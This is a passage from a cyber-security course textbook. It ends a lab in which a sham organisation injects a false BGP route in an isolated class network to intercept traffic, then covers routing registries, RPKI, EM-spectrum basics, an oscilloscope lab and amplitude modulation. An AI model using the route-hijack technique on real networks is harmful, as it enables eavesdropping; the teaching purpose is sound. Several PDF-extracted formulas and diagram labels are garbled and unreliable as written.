From that vantage point they could observe all traffic destined for 17.17.200.0/24 and identify those who were enjoying themselves rather than paying attention in class. To do this, the PTA made the following announcement from Router 3 in AS2003: Question 5: Assuming no local preferences are set and for every AS in the EC310 internet, on your network diagram draw the path each AS would select to reach 17.17.200.2 beginning from the AS router and ending with the MidTube webserver. The correct answer to Question 5 will be explained in detail by your instructor, but the astute midshipmen may realize the PTA’s actions only redirects traffic in the forward direction. That is, traffic leaving AS2016 destined for the MidTube webserver would be forced through AS2003 but traffic leaving AS2005 destined for AS2016 would not be forced through AS2003. The MidTube webserver will respond to all web requests via a separate path chosen by Router 5 of AS2005. 434 Question 6 (Extra Credit): What announcement(s) should the PTA use in order to become the MITM in the reverse direction? (Hint: Consider the Initial Setup instructions of Security Exercise 17 and 18) 3. Disconnect from the EC310 Internet Close all tabs in Chrome or Firefox. Disconnect the blue Ethernet cable. Turn on your wireless adapter. STOP! We’ll now return to your regularly scheduled lecture. Part 3: The Real Internet While it is fun playing around in the EC310 internet, it is not enough to see all the parts and pieces that make the real Internet work. Let’s get to know some of the organizations we mentioned in lecture that are responsible for the safe and effective operation of the real Internet. Let’s also take a closer look at the solutions available to secure Internet routing. 1. Internet Routing Registries Recall from Chapter 18 the Internet Routing Registries (IRRs) house important information about the IP prefixes, ASNs, routing policy, network topology and human points of contact of registered ASes. Access the website www.irr.net in either Firefox or Chrome on your Windows computer (i.e., not your Cyber2 VM) via the USNA network (i.e., not the EC310 internet). Click the link for an ‘Overview of the IRR’ Question 7: What do the IRRs provide? Question 8: When did they come about? Click the link for a ‘List of Routing Registries’ Question 9: How many routing registries are there? Click the link for ‘FAQ: Why Use a Routing Registry?’ Read the first email shown from oberman@es.net Question 10: Why use a routing registry? Question 11: Do people trust the information in the IRR? When is this a problem? 2. Regional Internet Registries and Resource Public Key Infrastructure One of the most effective solutions against false route injection into the Internet routing system is the use of Resource Public Key Infrastructure (RPKI). Just within the last few years, all Regional Internet Registries (RIRs) began offering RPKI. Access the website https://www.arin.net/resources/rpki/index.html in either Firefox or Chrome on your Windows computer. Watch the video ‘Resource Certification Explained’ to learn more about how RPKI works. Question 12: In RPKI, what is used to verify that an IP address has been allocated to a specific entity? Question 13: In RPKI, what is used to verify that an AS may originate a specific network prefix? Question 14: What is one thing RPKI does not provide assurance of? Question 15: What must AS network operators do with the data from RPKI to secure Internet routing? STOP! We’ll now complete your regularly scheduled lecture. 435 436 Security Exercise 18 Answer Sheet Name: Question 1: Question 2: Question 3: Question 4: Question 5: Question 6 (Extra Credit): Question 7: Question 8: Question 9: Question 10: Question 11: Question 12: Question 13: Question 14: Question 15: 437 Network: _____._____._____._____ /____ c) .1 .2 4.4.4.0/24 18.18.18.0/30 .1 AS 30 .2 .1 16.16.16.0/30 .1 .2 .2 .2 www.pta.net 21.200.3.2 AS 2003 Network: 17.17.200.0/24 AS-Path: 2005 R60 AS 60 14.14.14.0/30 .1 21.200.3.0/24 Network: 21.200.3.0/24 AS-Path: 2003 R3 SX18 ONLY Network: _____._____._____._____ /____ .1 .2 .2 20.20.20.0/30 .1 R5 17.17.200.2 www.midtube.com 17.17.200.0/24 AS 2005 .2 AS-Path: _________________________ 13.13.13.0/30 9.9.9.0/30 19.19.19.0/30 R30 15.15.15.0/30 EC310 Security Exercise 17 & 18 .2 .1 .1 8.8.8.0/30 .2 .2 AS 40 R40 .1 b) 7.7.7.0/30 AS 50 R50 a) AS-Path: _________________________ Network: _____._____._____._____ /____ .2 12.12.12.0/30 Network: _____._____._____._____ /____ RA AS-Path: ____________________________ .1 .2 Other USNA Networks R16 3.3.3.0/30 .1 AS-Path: _________________________ AS 20 .1 AS 2016 R20 RC .2 2.2.2.0/29 .1 .10 ?.?.?.?/?? 438 Part III: Wireless In this, the final module of the course, you will be introduced to how digital information,in the form of bits, is moved from one location to another through free space−that is, without using wires or cables. However, while the ability to move information through free space makes communication more convenient, it also makes communication more susceptible to eavesdropping or jamming. Therefore, we will also explore the vulnerabilities of wireless communication. 439 440 Chapter 19: Communications Systems, EM Spectrum, and Signals Objectives: (a) Describe the four components of a communications system and the impact on security of using free space as a communication medium. (b) Identify communication applications for various bands of the electromagnetic spectrum ranging from extremely low frequency (ELF) to extremely high frequency (EHF). (c) Define the term signal and explain the basic properties of a sinusoidal electromagnetic signal (period, frequency, wavelength, phase, and amplitude) and describe their mathematical relationship. (d) Plot simple (sinusoidal) electromagnetic signals in the time and frequency domains; interpret time- and frequency-domain plots to determine the associated signals. (e) Define and calculate bandwidth of transmitted signals. Connection to Cyber Security This chapter marks the beginning of the third part of EC310. In Part I: The Host, we examined how data are stored and accessed in memory at the machine level and examined the resulting threats against a specific computer, focusing on the buffer overflow attack. In Part II: Networks, we concentrated on understanding how the Internet works and how networks are just as important and vulnerable as the individual host computers that reside on them. In Part III: Wireless, we will gain an appreciation for communicating in an environment without physical connections to every computer, router, etc. in the network, leading up to how wireless communication systems can be hacked. (Graphic by Dane Brown) I. Communications Systems and the Electromagnetic Spectrum A. Communication Systems The purpose of a communications system is to transmit information over a distance. This “information” could be audio (such as speech or music), video, sensor data (temperature, pressure), or other data (e.g., text, stock prices, photos, etc.). “Over a distance” may mean from here to the other side of the world via a satellite, or from one computer to another in a network, or from your computer’s CPU to its RAM. Any communications system consists of the following basic components, which are shown in the following figure. There are four main components: Transmitter – converts information into an electronic form suitable for the channel Channel – the physical medium through which an electronic signal travels 441 o e.g., wire, fiber-optic cable, free space (i.e., air), water (sonar) Receiver – converts the received signal back to a usable form Noise – undesired, random corrupting energy The information is passed to the transmitter. The receiver produces a “recovered” information signal, which may not be the same signal that was transmitted. This is because a significant, though undesired, occurrence in all communication systems is noise, which is random energy that enters the system and interferes with (corrupts) the transmitted message. If the noise is strong enough, the information signal may not get through at all. You’ve all heard what noise sounds like, for example on a telephone (we sometimes refer to it as static). If the static is very powerful you will only hear a small portion (or none) of the words that are spoken to you. This relationship between the useful signal and corrupting noise will be formalized in chapter 23. Noise can be divided into two broad categories: External noise is noise introduced into the transmission channel from outside sources. Examples include: o Industrial noise arising from man-made electrical sources (e.g., motors, generators, switches) o Atmospheric noise due to naturally occurring disturbances in earth’s atmosphere (e.g., lightning) o Extraterrestrial noise due to solar and cosmic activity. Internal noise is noise introduced by the electronics inside the receiver itself. Examples include: o Thermal noise o Semiconductor noise For the third block of this course, we will focus on communications systems in which our channel or medium is free space. Free space can refer to a perfect vacuum (as you might recall from physics), or to the air (as opposed to transmission through a wire or other material). Signals that propagate in free space are often referred to as “wireless” or “over-the-air” signals, and all signals in free space are part of the electromagnetic spectrum. With wireless routers and satellites part of almost every network, especially in military applications, understanding the electromagnetic spectrum is critical to cyber security. B. Electromagnetic Spectrum The electromagnetic spectrum is the range of all possible frequencies of electromagnetic waves. The spectrum is broken into regions/ranges and classified by frequency and/or wavelength. The frequency (f ) of an electromagnetic wave is a measure of how rapidly it oscillates. Frequency is measured in Hertz (1 Hz = 1 cycle/sec). The period (T) of an electromagnetic wave is the length of time required to complete one cycle. The period is measured in seconds, and is the reciprocal of the frequency in Hz (T = 1/f). Wavelength (λ) is the physical distance between the peaks of one cycle of a transmitted wave as it moves through the medium, and is measured in meters (m). The following plots show an EM wave’s voltage as a function of time (left plot), and as a function of distance (right plot). For electromagnetic waves traveling in air (or vacuum), we will assume that they travel at the speed of light (c) which is roughly 3 x 108 m/s. The wavelength is inversely proportional to the frequency, and is related to the speed of light by: c l= . f 442 The specific bands of frequencies in the EM spectrum is shown in the following figure. In this course, we are concerned with communications in the frequency ranges from ELF to EHF. Later in the course, you will see that antennas are needed to transmit information using the EM spectrum. The following figure should give you an idea of the relationship between wavelength size (which will determine antenna size) and transmission frequency throughout the Electromagnetic Spectrum. You should be familiar with the frequency ranges for communications from ELF to EHF. Extremely low frequency (ELF) 30 Hz to 300 Hz. Power line frequencies and low end of human audio. Voice frequency (VF) 300 Hz to 3000 Hz. Typical range associated with human voice. Very low frequency (VLF) 3 kHz to 30 kHz. Used for communications with submerged submarines. Low frequency (LF) 30 kHz to 300 kHz. Long range radio navigation. Medium frequency (MF) 300 kHz to 3000 kHz. AM radio and long range communication. High frequency (HF) 3 MHz to 30 MHz. Known as “short wave”, used by two-way radio. Very high frequency (VHF) 30 MHz to 300 MHz. Radio communications and FM radio. Ultra high frequency (UHF) 300 MHz to 3000 MHz. TV, military and cell phones. Super high frequency (SHF) 3 GHz to 30 GHz. Microwave. Satellite communications and radar. Extremely high frequency (EHF) 30 GHz to 300 GHz. Satellite communications. Practice Problem 19.1 What is the wavelength of an FM radio station whose broadcast frequency is 101.1 MHz? Practice Problem 19.2 What is the frequency of a signal whose wavelength is 8 cm? Bandwidth Bandwidth is the amount of the frequency spectrum occupied by a signal regardless of where it is in the spectrum. It is the difference between the upper and lower frequency limits of the signal. Typical bandwidths: AM Radio Station – 10 kHz FM Radio Station – 180 kHz Broadcast TV Station – 6 MHz 443 If a signal occupies the range of frequencies between approximately 300 Hz and 3000 Hz. The following figure demonstrates that for that signal, it’s bandwidth would be 2700 Hz. Federal Communications Commission (FCC) The electromagnetic spectrum is crowded; everyone wants some bandwidth. The FCC was established by the Communications Act of 1934 to regulate interstate and foreign communication. The FCC: Allocates bands of frequencies for specific uses Sets limitations on broadcast power Monitors broadcasts to detect unlicensed operations and technical violations Auctions spectrum usage The FCC controls which portions of the EM spectrum are used for various purposes (e.g. FM radio, AM radio, broadcast TV, satellite communications). The FCC also makes sure that transmissions do not interfere with each other (two transmitters physically close to each other transmitting in the same frequency range can destroy each other’s signals). For example, Washington D.C. can have an FM station that transmits at 101.1 MHz (the FM station called FM101), but Baltimore cannot have an FM station that transmits at 101.1 MHz because it is too close to the Washington D.C. station (approximately 35 miles away). Because the spectrum is a non-renewable resource in a society that is increasingly connected it is incredibly precious. To give you an idea of its value, 400 MHz of spectrum was auctioned by the FCC in 2015 and sold for $44.9 billion dollars! II. Signals as a Function of Time and Frequency Recall that the purpose of a communications system is to transmit information over a distance. The block diagram for a communication system is again shown below. Thus far, we’ve covered that during the final section of this course we’re going to focus on free space as our channel or medium, which means we’re considering the electromagnetic spectrum. Why do we care? Information can be in various forms. We transmit information in the form of a signal. A. Signals A signal is a function that conveys information. Signals are considered either analog or digital. Analog Signals An analog time-signal is one that is defined along a continuum of times and amplitudes. For example, the continuous changes in air pressure produced by a vibrating vocal cord or guitar string are examples of analog voice and music signals, respectively. An analog signal can take on an infinite number of values between a maximum and a minimum level; that is, the values are from a continuum. Some examples of analog signals are shown below. 444 Digital Signals A digital time-signal, in contrast, is one that is defined for only discrete values of time and amplitude. Digital signals change in discrete increments and can be used to represent binary information, such as that used by computers. Although this is its strict definition, the term “digital signal” is also often used to refer to continuous-time signals that can take on only a fixed set of states or amplitude values. We will adopt this usage frequently in EC310, and these are the types of digital signals shown in the figure below. Digital signals will be covered in more detail in Chapters 21-22. A simple example of a signal, widely used in both analog and digital communications is a tuning fork (that is, the sound it produces is its signal). You can hear the tuning fork, but if you were to look at it graphically as a function of air pressure over time, you would see a something that looks like this, which is a sine wave at a frequency of 440 Hz. 0.15 0.1 Voltage (V) 0.05 0 -0.05 -0.1 -0.15 0 0.005 0.01 0.015 0.02 0.025 Time (sec) B. Time Domain (Sine Wave) Earlier in this chapter, we discussed some basic properties of sinusoidal (electromagnetic) waves. A sinusoidal voltage waveform can be expressed mathematically in the following way: vm (t) = Vm sin ( 2p fmt + q ) fm = 1 Tm Amplitude (Vm) – distance from average to peak (in volts) Period (Tm) – time to complete one cycle (in seconds) Frequency (fm) - number of cycles in one second (in Hz) Phase ( )– Left/right shift with respect to the t = 0 axis (in radians) The sine wave is one way to represent the sound the tuning fork makes as a function of time. This is referred to as its “time domain” representation. If the amplitude of the signal is 2 Volts, then the equation for the tuning fork signal would be: vm (t) = 2sin(2p 440t) . This signal can also be represented in terms of its frequency content (i.e., which frequencies are present in the signal) in the “frequency domain.” C. Frequency Domain (Frequency Spectrum) To display a signal in the frequency domain, we determine the frequency content of the signal (which can be done using Fourier theory or, for this class, when the signals we will analyze are composed of sinusoids it can be done by inspection). The frequency content is then displayed on a plot of magnitude vs. frequency. (magnitude is the absolute value of amplitude). Since our tuning fork is a very simple tone with a single frequency component of 440 Hz and an amplitude of 2V, the frequency domain plot looks like this: 445 Both the time-domain (sine wave) and the frequency-domain displays represent the important characteristics of the tuning fork as far as a communication system is concerned– they’re just different ways to express the same signal. For communication engineers, the primary interest is what portion of the frequency spectrum does the signal occupy and how strong is the signal (magnitude); for our purposes, phase offset (if present) is not part of the frequency plot. Suppose we had a slightly more complicated signal. Suppose vm (t) = 2sin ( 2p 440t ) - 3sin ( 2p 900t + p 4 ) + 5cos ( 2p1100t - 2p 7 ) . In this case, there are three sinusoids (i.e., there are three frequencies in the signal) so the frequency plot will have three spikes, at the three frequencies given, with heights corresponding to the magnitudes of the amplitudes given. Again, the phases shown are not a part of this plot. Part of the benefit of a frequency domain representation is that certain signal attributes, like bandwidth, are easy to visualize. For instance, in the above graph, you can quickly see the bandwidth is 1100 Hz – 440 Hz = 660 Hz. 446 Problems 1. What is the purpose of a communications system? Draw and explain the components. 2. What part of the electromagnetic spectrum (frequency range) is visible to humans? 3. Find 5 major uses of the UHF band (Use a book or the Internet to find your answer). 4. Calculate the frequency of signals with the following wavelengths: 6. 30 m b. 2 km c. 8 cm AM Radio a. What is the frequency range used by AM radio broadcast stations? b. What is the bandwidth (BW) occupied by each station? Given the sine wave below, answer the following questions: Amplitude (V) 5. a. 4 3.75 3.5 3.25 3 2.75 2.5 2.25 2 1.75 1.5 1.25 1 0.75 0.5 0.25 0 -0.25 -0.5 -0.75 -1 -1.25 -1.5 -1.75 -2 -2.25 -2.5 -2.75 -3 -3.25 -3.5 -3.75 -4 0 0.01 0.02 0.03 0.04 0.05 0.06 0.07 0.08 0.09 0.1 time (msec) a. What is the period of this signal? b. What is this signal’s amplitude? c. What is the frequency of this signal? d. In which range of the electromagnetic spectrum would this signal be classified? e. What is the wavelength of this signal? f. Sketch this signal in the frequency domain. 447 0.11 0.12 0.13 0.14 0.15 7. Given the following equation for a signal, sketch the frequency plot. Put your frequency axis in kHz. vm (t) = -18sin ( 2p 44,000t ) +13sin ( 2p150 ´10 3 t - 6p 11) + 7cos ( 2p 30 ´10 4 t + p 21) 8. Given the following plot, write the equation for one signal that has this as its frequency plot (note: there is not one single answer). 448 Security Exercise 19 Introduction to Signals in the Time and Frequency Domains PART I: INTRODUCTION & SINUSOIDAL SIGNALS Check-off each step as you complete it. Step One: Function generator setup. □ □ □ □ Turn on power to the lab bench . The power switch is on the right side of the lab bench and is labeled "120 V OUTLETS." The switch should be in the raised position if power is on. Locate the "10MHz Function/Arbitrary Waveform Generator" on the lab bench and turn the power on. We will refer to this equipment as simply the "function generator." Select the sinusoidal function by pressing the button with the Sine wave on it. The function generator display should indicate a small sine wave. Turn any other lit buttons off. As the name implies, the function generator is able to generate electrical signals. For this lab we will use the function generator to generate sinusoidal voltage waveforms. We will set the frequency to 1.75 kHz using the key pad method. □ □ □ Select the Frequency (Freq) function using the soft keys under the display screen. Enter the desired frequency (1.75) using the key pad. Enter the desired units (kHz) by pressing the button under kHz on the screen. We will set the size of the waveform to 10 Vpp (volts peak-to-peak) using the key pad method. □ □ □ □ □ Select the Utility function and then select the Output Setup soft key. Check that High Z is highlighted. If not, push the Load/High Z button until it is highlighted. Push Done. Select the Amplitude (Ampl) function using the soft keys under the display screen. Enter the desired amplitude (10) using the key pad. Enter the desired units (Vpp) by pressing the button under Vpp on the screen. Press the output button. It should now be lit indicating the function generator is producing an output. Right now your function generator is generating a 1.75 kHz signal that has a peak-to-peak voltage of 10V. But…that signal is not leaving the function generator. To see the signal, we will send the output of the function generator to an oscilloscope. Proceed to Step Two! Step Two: Oscilloscope familiarization. 449 □ Locate the oscilloscope at the top of your lab bench and turn its power on. The power push button is located on the top left of the oscilloscope. The oscilloscope can receive electrical signals from two probes, channel 1 (CH 1) and channel 2 (CH 2). We have attached adaptors to CH 1 and CH 2, so that they can receive electrical signals via our banana plug cables. □ □ Locate the CH 1 input on your oscilloscope. It will have a two-input (RED / BLACK) banana plug adaptor installed. Connect banana plug cables (which can be found under the bench on the plastic Quad board) from the function generator’s output to the CH 1 input on the oscilloscope (connect red-to-red and black-to-black). The oscilloscope has the ability to measure and display two different electrical signals, but only with respect to one common reference point. The BLACK CH 1 input provides this common reference point (ground) for both CH 1 and CH 2. Therefore, CH2 has an adaptor for only one banana plug. We will not be using CH2 for this lab. Before looking at our sine wave on the scope in detail, let's first pause and look at a generic display which explains how the information on the oscilloscope screen is presented. Your screen will not look like the screen shown in Figure 1 below! In the figure below, we see that the oscilloscope display is divided up into eight major vertical divisions. The bottom left corner of the oscilloscope—where you see "CH1 100mV"—indicates the number of volts per division for a given channel. You can see that CH 1 and CH 2 indicate 100mV per division, therefore each major division in the vertical axis represents 100mV. Similarly there are ten major divisions on the horizontal axis that represent time. Each major division on the horizontal axis of the display represents 250μs. CH1 and CH 2 can have different Volts/Div, but will always share the same Sec/Div. Step Three: Display your sine wave with the oscilloscope. □ Press the AUTOSET button( top right) on the oscilloscope. AUTOSET will measure the input signals for the channels selected and attempt to display something meaningful. 450 □ □ □ □ □ With the CH 1 menu selected, adjust the position of the vertical axis zero level by rotating the vertical position knob in the CH 1 column, so that the “1→” on the left side of the display is adjacent to the major horizontal axis (centered vertically on the display). If needed, press the CH2 Menu button twice to turn off the CH 2 trace, since nothing is connected to CH 2 for this lab (CH 2 is displaying background noise). Press CH 1 MENU on the oscilloscope and make the following settings. Coupling: AC BW Limit: OFF Volts/Div: COARSE Probe: 1X Invert: Off Adjust the VOLTS/DIV knob under the vertical section in the CH 1 column, so that CH 1 indicates 2 Volts/Div on the bottom left corner of your display. Adjust the SEC/DIV knob under the horizontal axis, so that the oscilloscope indicates 100 s per major division on the LCD on the bottom middle of your display. Step Four: Measuring the waveform on the oscilloscope. Manual method. The first method is by counting the divisions of grid and applying the scale (volts/div for vertical, or sec/div for horizontal). This will only provide you with approximate values with little precision. Question 1. Fill out the table on your answer sheet using this manual measurements method. Specifically: □ Using the vertical scale, determine the peak-to-peak voltage on CH1 which is the total voltage from positive peak to negative peak. That is, you should count the number of vertical divisions from peak to peak, and multiply the number of divisions by the number of volts/division. □ From your measured Vpp, determine the amplitude of the signal (Vm). □ Using the horizontal scale, determine the period (Tm) and then calculate the signal's frequency. That is, you should count the number of horizontal divisions for one full cycle, and then multiply the number of divisions by the number of microseconds (in this case) per division. Taking measurements with cursors. The oscilloscope has time and amplitude cursors that you can move on the plot to help take measurements of voltage, period and frequency. □ □ □ □ □ □ Press the Cursor button (top middle) to view the cursor menu on LCD. Then choose the Type of cursor to be Amplitude by cycling through the options on the button associated with this menu option. Two horizontal cursors will now appear that are moveable. Choose the Source to be CH 1. Two cursors are now available for you to move around the display. Push Cursor 1 to move the first cursor, and Cursor 2 when you want to move the second cursor. The cursors are moved using the large knob next to the green power-on light. Place cursor 1 at the sinusoid’s maximum voltage, and cursor 2 at it’s minimum. The ΔV value (which is the voltage difference between the two cursors) can be read out on the right side of the display…this is the peak-to-peak voltage. Then choose the Type of cursor to be Time by cycling through the options on the button associated with this menu option. Two vertical cursors will now appear that are moveable. Adjust the two time cursors to allow you to measure the period of the sinusoid. Question 2. Fill out the table on your answer sheet the using cursor measurements method. Taking automatic measurements. The oscilloscope has the ability to take automated measurements of voltage, period and frequency. 451 □ □ □ □ □ Press the Measure button (top middle) to view the measurement menu on LCD, then push the top menu box button to highlight Source and select CH1 for Measure 1. Then choose the Type of measurement to be Pk-Pk by cycling through the options on the button associated with this menu option, and then hit button for Back option Press the second to top menu box button to select Measure 2. Then choose the Type of measurement to be Freq by cycling through the options on the button associated with this menu option, and then hit button for Back option You can add new measurements for all 5 buttons. Amplitude is not automatically measured but can still be calculated from the peak-to-peak voltage as before. Record your results in Question 2. Question 3. Fill out the table on your answer sheet using the automatic measurements method. Consider how you would describe your sinusoidal signal as an equation:. The phase describes the start of one signal relative to another, so we will assume the phase is zero. Question 4. The equation for a sine wave is vm (t) = Vm sin(2p fmt + q ) . Write your equation for the sinusoid based on your measurements from the previous pages. Step Five: Measuring a pure sine wave in the frequency domain. Our scope can also provide a frequency spectrum of a signal. For this particular sinusoidal signal we know it is periodic and has a single frequency, fm, described by the previous measurements and shown in our equation. Now let us see how this signal is displayed in the frequency domain. The oscilloscope performs a Fast Fourier Transform (FFT) and displays the magnitudes of the frequencies present in the signal vs. frequency, so the horizontal scale shows frequency (in Hz) instead of time. □ □ □ Press AUTOSET (top right) and you will see the options to display the signal in time or in frequency (FFT). Push the button next to the FFT and you will see a spike at a particular frequency. Set the horizontal scale to read 250Hz per division by turning the Sec/Div knob. At this point, you should see one large spike in the display (which corresponds to the sinusoidal signal from CH1, and also many smaller spikes scattered throughout the frequency spectrum (this is noise). Your concern is the large spike. Question 5. The left edge of the display is 0 Hz, and frequency increases from 0 Hz as you move to the right. Determine the value of the frequency component ( fm= ?) by counting the number of horizontal divisions and multiplying that by the number of Hz per division. You can check your answer using the frequency cursor: □ Press the Cursor button (top middle) to view the cursor menu on LCD. □ Choose the Source to be MATH (note: this is because the FFT is a mathematical computation). □ Then choose the Type of cursor to be Frequency. Two vertical cursors are now available for you to move around the display. Push Cursor 1 to move that cursor, and place it on the largest spike. The readout of frequency will be displayed on the right side of the LCD. Question 6. Sketch your frequency plot (as seen on the oscilloscope) and label the axes with your values. Include the smaller noise spikes. Have your instructor check it. Note: this oscilloscope displays amplitude of the frequency content in decibels (dB) vice volts, as you have been taught. The default vertical scale is 10 dB per vertical division, and the bottom of the scale is 0 dB, so label the vertical axis accordingly. Use the Amplitude cursor on the FFT plot to determine the heights of the spike. PART II: PUTTING YOU TO THE TEST—UNKNOWN SIGNALS So…are you comfortable using the function generator and the oscilloscope? Let's find out! 452 Your instructors have pre-set two different sinusoidal signals into the function generator. Your goal is to determine the amplitude and frequency of each. □ □ □ Reset the Oscilloscope back to the time domain from the frequency domain, by pressing the Autoset button and then selecting the button next to the multiple cycles of a sinewave (at the top, above the FFT button). (If the pesky Channel 2 display is active, hit CH2 Menu twice.) Ask your Instructor/Lab Tech to enter Challenge Signal 1. You will find this challenging because it is named "Challenge Signal 1." Push AUTOSET on the Oscilloscope. Determine the amplitude and frequency of the sine wave. Obviously you should use only the oscilloscope (do not try to finagle with the function generator, pushing various buttons to see if it will cough up the answer!) Use only the oscilloscope! Place your answers in Question 7. Show your instructor or lab tech before continuing. □ □ Ask your Instructor/Lab Tech to enter Challenge Signal 2. You will find this challenging because…well…you know. Push AUTOSET on the Oscilloscope. Determine the amplitude and frequency of the sine wave. Use only the oscilloscope! Place your answers in Question 8. Show your instructor or lab tech before calling it a day. PART III: IT'S A WRAP! □ □ □ □ Unplug and stow the banana plug cables. Turn off your oscilloscope. Turn off your function generator. Pat yourself on the back for your cyber expertise. 453 454 Security Exercise 19 Answer Sheet Name: __________________________________________________________________________________________ Question 1: Peak-to-peak (Vpp) Amplitude (Vm) Period (Tm) Frequency (fm) Peak-to-peak (Vpp) Amplitude (Vm) Period (Tm) Frequency (fm) Peak-to-peak (Vpp) Amplitude (Vm) Period (Tm) Frequency (fm) vm(t) (CH1) Question 2: vm(t) (CH1) Question 3: vm(t) (CH1) Question 4: vm(t) =____________________________________ ( Show values) Question 5: Question 6: __________________________________ Instructor / Lab Tech Question 7: Question 8: Amplitude: __________ Frequency: __________ Amplitude: __________ Frequency: __________ ___________________ Instructor / Lab Tech ____________________ Instructor / Lab Tech 455 456 Chapter 20: Intro to Modulation Objectives: (a) Define the term baseband signal and describe some potential limitations associated with transmitting baseband signals directly. (b) Discuss the role of modulation in signal transmission and the methods of modulating a sinusoidal carrier. (c) Using a plot of an AM signal, determine Vmax, Vmin, Vm, Vc and m. (d) Create a frequency plot for and determine the sidebands and bandwidth of an AM signal where the information signal consists of one or more distinct sinusoids. (e) Determine the condition for overmodulation in an AM signal, and the consequence of overmodulation. Connection to Cyber Security In Chapter 19, we defined a communications system and learned that the wireless section of EC310 will focus on communications in which the communication channel is free space. We also learned that in order to send any information through a communications system it must be in the form of a signal (which is the name given to the function that conveys our information), and if our communication channel is free space, it means we’re dealing with signals carried in the Electromagnetic Spectrum (EM). Finally, we learned that signals can be represented as a function of either time or frequency. Wireless channels have different vulnerabilities than we saw in the host section of the course, because of the frequency of transmission. It is possible that a wireless network can be attacked like we saw in the networks section of the course, but to see how such a cyber attack can be carried out on a wireless network or a wireless communication in general, you must first understand how information is carried through the wireless channel. 1. Baseband Signals If you’re sitting in your EC310 classroom in the basement of Rickover Hall and you speak to the student next to you, will that person be able to hear you? Will you be heard across the room? How about at the end of that loooong Rickover passageway? Does anyone in Bancroft have a chance of hearing what you’re grumbling about in your EC310 classroom? Why not? Your voice doesn’t travel as far as you might like it to—your voice creates pressure waves in the air, and the strength of these waves attenuates over distance. The louder you yell the farther you’ll be heard, but this of course has its limits. As an alternative to walking around screaming all day, you might consider speaking at a more normal volume into a microphone. A microphone is a device that transforms sound pressure waves into electrical signals. You could then send the electrical output of the microphone to an antenna. Then your voice frequencies would travel as electromagnetic waves (“radio waves”), and as long as you provided enough power to the antenna, you could presumably greatly extend the geographic range of your EC310 musings. In this chapter, we’ll see that the latter approach is on the right track, but in order to be practical, it requires a bit more finesse. In this example our voice signal, which you’ll recall is comprised of frequencies roughly in the range between 300 Hz and 3 kHz, is what we call a baseband signal. Baseband signals are information signals at their original frequencies, typically low frequencies. To transmit a baseband signal directly as is, we use baseband transmission…as you’ll see in shortly, communication systems typically will upshift the frequency spectrum of baseband signals to a higher range of frequencies to allow transmission through the atmosphere. In general, before signals can be transmitted effectively, they must first be converted to a form that is compatible with the communication medium. One facet of this conversion is transducing the signal from its natural physical form into an electrical signal. For example, Microphones convert acoustic pressure waves (sound) into electrical signals. Video cameras convert light patterns into electrical signals. Computer keyboards convert physical input (typing) into an electrical signals. But, as alluded to above, even after converting your voice signal to, say, a voltage signal using a microphone, attempting to transmit it over the air as a baseband signal is impractical. Why? Let’s look at an example that will point us in the right direction. 457 Practice Problem 20.1 Physics dictates that antenna length is intrinsically tied to the wavelength of the signal it is transmitting or receiving. To transmit a signal through the atmosphere with an antenna efficiently, the length of the antenna must be at least a tenth of a wavelength long. What is the approximate length of the antenna required to transmit the sound of a tuning fork (which creates musical note A = 440 Hz)? Note: this sound must be transduced into an electrical signal first before it is transmitted. Wait! To transmit that lousy tuning fork signal my antenna needs to be at least 68 km? That’s over 42 miles! We’d need an antenna that extends into the upper parts of the atmosphere for that. Clearly, that’s not going to work. Well, I know that if I want to listen to the Navy game on the radio (because for some reason I avoided the mandatory fun), I can tune in to AM radio station 1430 WNAV. Recall that from Chapter 19, when referring to a commercial AM radio station, such as 1430 WNAV, that the 1430 refers to the center of its transmission frequency in kHz. So what size antenna does WNAV use? Practice Problem 20.2 (a) What is the wavelength of an AM radio station whose transmission frequency is 1430 kHz? (b) What is the approximate antenna length if the station uses an antenna that is half the wavelength long? 105 meters? Okay, that’s still big – it’s about 115 yards - almost an entire football field… but at least you don’t need an antenna that reaches into outer space now. In reality, WNAV’s antenna, pictured at right, is 117 meters. We’re close! The purpose of those two examples was to demonstrate that we need to somehow get our baseband information to a higher frequency (shorter wavelength) in order to be able to transmit it across our channel. Higher frequencies give us reasonable antenna sizes plus some added benefits: first, signals will attenuate less quickly if the higher frequencies are well-chosen. Second, multiple people whose voices all occupy the same baseband frequencies - can communicate without interfering if each transmits on a different higher frequency range. We can shift baseband information to higher frequencies for transmission using a process called modulation. 458 2. Modulation To overcome limitations of the communications channel and permit multiple access, information signals are impressed upon a higher-frequency carrier signal for transmission. This process is called modulation. Now we’re dealing with two signals: 1. Original (“baseband”) information signal - frequency is too low to transmit efficiently 2. Higher frequency (“carrier”) signal - we can transmit this efficiently, so we use it to carry our information Mathematically, representing the higher-frequency carrier is given by: the sine wave vc (t) = Vc sin(2p fc t + q ) Modulation is the process of varying any of three properties (amplitude, frequency or phase) of a high-frequency carrier using the lower-frequency information signal (baseband signal). A modulator is a component of a communication system which achieves modulation. The three types of modulation we will focus on are: Amplitude modulation (AM) – Varying the amplitude Vc of the carrier with the info signal. Frequency modulation (FM) – Varying the frequency fc of the carrier with the info signal. Phase modulation (PM) – Varying phase angle of the carrier with the info signal. Since the intention of the “Wireless” section of EC310 is to give you a broad understanding of wireless communication techniques rather than to make you communication engineers, we’re only going to go into more detail with amplitude 459 modulation (AM) in this chapter. This is NOT to say that frequency modulation and phase modulation are unimportant – they’re very important and very widely used. The fact is that there’s only so much modulation that can be reasonably covered in the last several chapters of this course, and AM is the easiest to visualize and demonstrate. Later, in Chapter 22: Digital Modulation, we will again address amplitude, frequency and phase modulation to some extent as they apply to digital communications. 3. Amplitude modulation (AM) In amplitude modulation, the information signal is used to vary the amplitude of the carrier sine wave. For simplicity, consider a sine wave information signal, vm(t) (a 440 Hz tuning fork) and a sinusoidal carrier, vc(t) (frequency 5000 Hz (5 kHz)). vm (t) = Vm sin ( 2p fmt ) = Vm sin ( 2p 440t ) The diagram of an amplitude modulation system using this information signal follows. The AM wave (vAM(t)) is the product of the carrier (with amplitude = 1) with a modulating signal. The modulating signal is the information signal vm(t) with an added offset, Vc. The AM signal is then given by: In the figure below, the top plot is of the information signal and the bottom is the resulting AM signal. Note that the information signal starts at a value of zero (for approximately 2 msec), so the resulting AM signal is the unmodulated carrier signal (meaning that the carrier is not being modulated). When the information signal is no longer zero, it starts to modulate the carrier’s amplitude as shown.The horizontal axes are time in msec. The information signal is equal to zero at the beginning, then changes to the tuning fork sine wave at approximately 2 msec. Here, the carrier and information signal parameters are: fc(t) = 5 kHz, Vc = 10V, fm(t) = 440 Hz, Vm = 7.5V. 460 A zoomed-in plot of the resulting modulated AM signal is as follows, 